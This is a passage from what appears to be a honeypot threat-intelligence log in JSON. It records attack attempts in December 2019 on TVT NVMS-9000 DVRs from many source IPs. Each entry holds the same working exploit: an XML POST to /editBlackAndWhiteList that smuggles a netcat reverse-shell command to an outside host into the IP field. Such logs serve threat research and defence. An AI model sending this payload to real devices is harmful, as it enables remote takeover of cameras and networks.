- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-20T00:39:59Z",
- "last_seen": "2019-12-20T00:39:59Z"
- },
- {
- "source_ip_address": "175.137.224.215",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T00:21:21Z",
- "last_seen": "2019-12-20T00:21:21Z"
- },
- {
- "source_ip_address": "78.165.55.254",
- "country": "TR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-20T00:17:45Z",
- "last_seen": "2019-12-20T00:17:45Z"
- },
- {
- "source_ip_address": "220.94.32.178",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T00:05:09Z",
- "last_seen": "2019-12-20T00:05:09Z"
- },
- {
- "source_ip_address": "24.90.184.128",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-20T00:00:43Z",
- "last_seen": "2019-12-20T00:00:43Z"
- },
- {
- "source_ip_address": "50.237.128.182",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-19T23:57:41Z",
- "last_seen": "2019-12-19T23:57:41Z"
- },
- {
- "source_ip_address": "79.108.210.122",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T23:38:24Z",
- "last_seen": "2019-12-19T23:38:24Z"
- },
- {
- "source_ip_address": "59.126.159.144",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T23:29:39Z",
- "last_seen": "2019-12-19T23:29:39Z"
- },
- {
- "source_ip_address": "220.135.86.102",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T23:15:29Z",
- "last_seen": "2019-12-19T23:15:29Z"
- },
- {
- "source_ip_address": "74.94.80.101",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T23:13:08Z",
- "last_seen": "2019-12-19T23:13:08Z"
- },
- {
- "source_ip_address": "189.123.41.100",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:57:10Z",
- "last_seen": "2019-12-19T22:57:10Z"
- },
- {
- "source_ip_address": "71.87.235.99",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:56:27Z",
- "last_seen": "2019-12-19T22:56:27Z"
- },
- {
- "source_ip_address": "102.182.92.231",
- "country": "ZA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:49:56Z",
- "last_seen": "2019-12-19T22:49:56Z"
- },
- {
- "source_ip_address": "115.134.229.14",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:46:19Z",
- "last_seen": "2019-12-19T22:46:19Z"
- },
- {
- "source_ip_address": "72.252.224.93",
- "country": "JM",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:18:04Z",
- "last_seen": "2019-12-19T22:18:04Z"
- },
- {
- "source_ip_address": "31.13.206.100",
- "country": "BG",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:08:54Z",
- "last_seen": "2019-12-19T22:08:54Z"
- },
- {
- "source_ip_address": "123.193.215.26",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T22:08:52Z",
- "last_seen": "2019-12-19T22:08:52Z"
- },
- {
- "source_ip_address": "179.95.58.170",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T21:24:04Z",
- "last_seen": "2019-12-19T21:24:04Z"
- },
- {
- "source_ip_address": "187.195.13.126",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T21:19:05Z",
- "last_seen": "2019-12-19T21:19:05Z"
- },
- {
- "source_ip_address": "201.213.123.127",
- "country": "AR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T21:17:53Z",
- "last_seen": "2019-12-19T21:17:53Z"
- },
- {
- "source_ip_address": "124.82.19.163",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T20:37:29Z",
- "last_seen": "2019-12-19T20:37:29Z"
- },
- {
- "source_ip_address": "209.76.187.110",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T20:34:26Z",
- "last_seen": "2019-12-19T20:34:26Z"
- },
- {
- "source_ip_address": "99.48.176.109",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 22,
- "first_seen": "2019-12-19T20:32:22Z",
- "last_seen": "2019-12-19T20:32:22Z"
- },
- {
- "source_ip_address": "94.27.197.218",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T20:31:25Z",
- "last_seen": "2019-12-19T20:31:25Z"
- },
- {
- "source_ip_address": "189.249.108.90",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T20:25:03Z",
- "last_seen": "2019-12-19T20:25:03Z"
- },
- {
- "source_ip_address": "111.185.59.4",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-19T20:23:20Z",
- "last_seen": "2019-12-19T20:23:20Z"
- },
- {
- "source_ip_address": "122.116.232.61",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 25,
- "first_seen": "2019-12-19T20:07:16Z",
- "last_seen": "2019-12-19T20:07:16Z"
- },
- {
- "source_ip_address": "125.134.69.157",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
